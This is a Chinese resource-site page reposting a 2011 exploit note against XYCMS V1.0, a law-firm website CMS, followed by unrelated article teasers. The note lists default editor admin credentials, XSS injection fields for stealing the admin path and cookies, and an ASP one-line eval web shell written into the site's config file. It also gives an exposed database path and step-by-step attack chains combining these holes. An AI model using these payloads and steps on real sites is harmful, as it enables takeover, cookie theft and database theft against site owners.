首页 > 教育资源 > 资料大全

XYCMS律师事务所建站系统 V1.0多处缺陷漏洞预警 -电脑资料

旧执如初分享2014-03-03 01:47:34 次阅读

#########################################

# XYCMS律师事务所建站系统 V1.0#

# http://down.admin5.com/asp/71909.html #

# B0mbErM@n ; 2011-2-18#

#########################################

############### eWebEditor ##############

http://127.0.0.1:99/system/xyeWebEditor/admin/login.asp

User=XY2010Pass=XY2010

##################XSS#################

http://127.0.0.1:99/online.asp

Qq:[XSS]

Mail:[XSS]

Photo:[XSS]

Contents:[XSS]

################## Eval #################

http://127.

0.0.1:99/system/admin_setup.asp

WebName:<% eval request("pass")%>

http://127.0.0.1:99/inc/config.asp

##################MDB#################

http://127.0.0.1:99/xydata/xycms.mdb

################# Hacking ################

1:eWebEditor

2:XSS+Eval

(1)标题和姓名写的真实些

(2)插入XSS获取后台路径以及cookie

(3)Eval

3:MDB+Eval

(1)MDB

(2)Eval

4:XSS+MDB+Eval

(1)MDB

(2)XSS-标题和姓名写的真实些

(3)插入XSS获取后台路径

(4)Eval

相关文章

执行纪律方面存在的问题

在十八届中央纪委三次全会上深刻阐述了严明党的组织纪律、加强组织纪律性的重要性，并强调全党同志要“相信组织、依靠组织、服从组织，自觉接受组织安排和纪律约束，自觉维护党的团结统一”，欢迎阅读本文，更多优质...

资料大全2018-07-04

执行纪律方面存在的问题

友谊的谚语

谚语是民间集体创造、广为流传、言简意赅并较为定性的艺术语句，以下是由应届毕业生网PQ小编为大家收集整理出来的2016关于友谊的谚语，希望能够帮到大家，关于友谊的谚语。关于友谊的谚语A...

资料大全2015-01-04

友谊的谚语

朗读者张梓琳的刘瑜《愿你慢慢长大》

朗读者张梓琳的刘瑜《愿你慢慢长大》亲爱的小布谷：今年六一儿童节，正好是你满百天的日子。当我写下“百天”这个字眼的时候，着实被它吓了一跳——一个人竟然可以这样小，小到以天计。在过去一百天里，你像个小魔术...

资料大全2014-01-05

朗读者张梓琳的刘瑜《愿你慢慢长大》

请勿吸烟倡议书

在快速变化和不断变革的新时代，倡议书应用范围愈来愈广泛，在写作上，倡议书有一定的书写规范。相信很多朋友都对写倡议书感到非常苦恼吧，下面是小编收集整理的请勿吸烟倡议书范文（通用8篇），欢迎大家借鉴与参考...

资料大全2016-09-04

请勿吸烟倡议书

商务名片礼仪

一般来说，名片是商务人员对外交往时发送的自己的“身份档案”，是让对方记住你、能找到你的小广告，商务名片礼仪。名片是你的象征，也是你所在企业的象征。在社交场合，没有名片的人是一...

资料大全2017-09-08

商务名片礼仪

墓碑碑文对联大全

墓碑对联是一种雕刻在墓碑上悼念死者的对联，那么今天，CN人才网小编为大家带来的是2017墓碑碑文对联大全，希望对大家有帮助~1，功昭后人;德炳丹青。。2，青山茂;碧海翰泽长。3，祥云笼吉地;瑞气绕...

资料大全2019-05-06

墓碑碑文对联大全